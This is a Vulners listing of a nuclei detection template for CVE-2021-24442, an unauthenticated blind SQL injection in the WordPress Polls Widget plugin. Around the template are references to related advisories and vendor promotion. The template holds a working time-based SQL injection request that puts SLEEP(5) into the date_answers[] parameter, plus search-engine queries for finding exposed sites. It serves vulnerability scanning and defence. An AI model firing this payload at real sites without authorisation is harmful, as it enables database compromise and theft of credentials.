Lucene search
K

Wordpress Polls Widget < 1.5.3 - SQL Injection

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 69 Views

Wordpress Polls Widget < 1.5.3 - SQL Injection allows unauthenticated users to perform SQL Injection attacks. Fixed in 1.5.3

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2021-24442
6 Jun 202500:00
circl
CNNVD
WordPress 插件 SQL注入漏洞
12 Jul 202100:00
cnnvd
CNVD
WordPress plugin code injection vulnerability (CNVD-2021-52424)
14 Jul 202100:00
cnvd
CVE
CVE-2021-24442
12 Jul 202119:21
cve
Cvelist
CVE-2021-24442 Poll, Survey, Questionnaire and Voting system < 1.5.3 - Unauthenticated Blind SQL Injection
12 Jul 202119:21
cvelist
NVD
CVE-2021-24442
12 Jul 202120:15
nvd
OSV
CVE-2021-24442
12 Jul 202120:15
osv
Patchstack
WordPress Polls Widget plugin <= 1.5.2 - Unauthenticated Blind SQL Injection (SQLi) vulnerability
22 Jun 202100:00
patchstack
Prion
Sql injection
12 Jul 202120:15
prion
RedhatCVE
CVE-2021-24442
22 May 202520:31
redhatcve
Rows per page
id: CVE-2021-24442

info:
  name: Wordpress Polls Widget < 1.5.3 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The Poll, Survey, Questionnaire and Voting system WordPress plugin before 1.5.3 did not sanitise, escape or validate the date_answers[] POST parameter before using it in a SQL statement when sending a Poll result, allowing unauthenticated users to perform SQL Injection attacks
  impact: |
    Unauthenticated attackers can execute SQL injection to manipulate database contents, potentially gaining unauthorized access to all WordPress data including user credentials.
  remediation: Fixed in 1.5.3
  reference:
    - https://wpscan.com/vulnerability/7376666e-9b2a-4239-b11f-8544435b444a/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24442
    - https://wordpress.org/plugins/polls-widget/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24442
    cwe-id: CWE-89
    epss-score: 0.46921
    epss-percentile: 0.98684
    cpe: cpe:2.3:a:wpdevart:poll\,_survey\,_questionnaire_and_voting_system:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: wpdevart
    product: poll\,_survey\,_questionnaire_and_voting_system
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/polls-widget/
    fofa-query: body=/wp-content/plugins/polls-widget/
    publicwww-query: "/wp-content/plugins/polls-widget/"
  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,polls-widget,sqli,wpdevart,vkev,vuln

http:
  - raw:
      - |
        @timeout: 25s
        POST /wp-admin/admin-ajax.php?action=pollinsertvalues HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        X-Forwarded-For: {{randstr}}

        question_id=1&poll_answer_securety=8df73ed4ee&date_answers%5B0%5D=SLEEP(5)

    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains_all(body, "{\"answer_name", "vote\":")'
        condition: and
# digest: 4a0a00473045022100fe285ebfd3a53eed6d528b3f04ac65e1a994235064c05463aad176517df4b56402205ca05811ff021083725f1af594a670f44278ba1c87385744627471d3e477f552:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.46921
69